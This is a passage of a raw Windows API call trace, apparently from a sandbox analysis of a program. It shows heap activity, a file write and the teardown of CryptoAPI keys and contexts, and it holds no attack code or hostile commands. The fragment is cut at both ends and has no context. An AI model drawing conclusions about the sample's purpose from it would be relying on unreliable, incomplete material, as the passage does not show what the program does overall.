0x2e51088 [0237.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0237.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0237.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0237.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0237.404] WriteFile (in: hFile=0x2d0, lpBuffer=0x2edb938*, nNumberOfBytesToWrite=0x12460, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2edb938*, lpNumberOfBytesWritten=0x8cf5e4*=0x12460, lpOverlapped=0x0) returned 1 [0237.408] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0237.409] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0237.409] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0237.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0237.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0237.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0237.410] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.410] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0237.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0237.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0237.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0237.411] CryptDestroyKey (hKey=0xa86f90) returned 1 [0237.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0237.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0237.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0237.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0237.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0237.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0237.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.413] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0237.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0237.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.413] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0237.414] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0237.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0237.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0237.414] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0237.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0237.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0237.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0237.414] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0237.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0237.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0237.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0237.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0237.414] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0237.415] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0237.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.415] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0237.415] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0237.415] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0237.415] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0237.415] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0237.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.415] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0237.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.415] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.416] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0237.416] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0237.416] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.416] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0237.416] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.416] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0237.416] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0237.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.417] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0237.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0237.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0237.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0237.417] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0237.417] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0237.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0237.418] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0237.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0237.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.418] FreeLibrary (hLibModule=0x756e0000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0237.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0237.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0237.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0237.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0237.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0237.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0237.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0237.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0237.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0237.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0237.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0237.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.419] CloseHandle (hObject=0x2a0) returned 1 [0237.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0237.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0237.419] HeapFree (in: hHeap=0x970000, 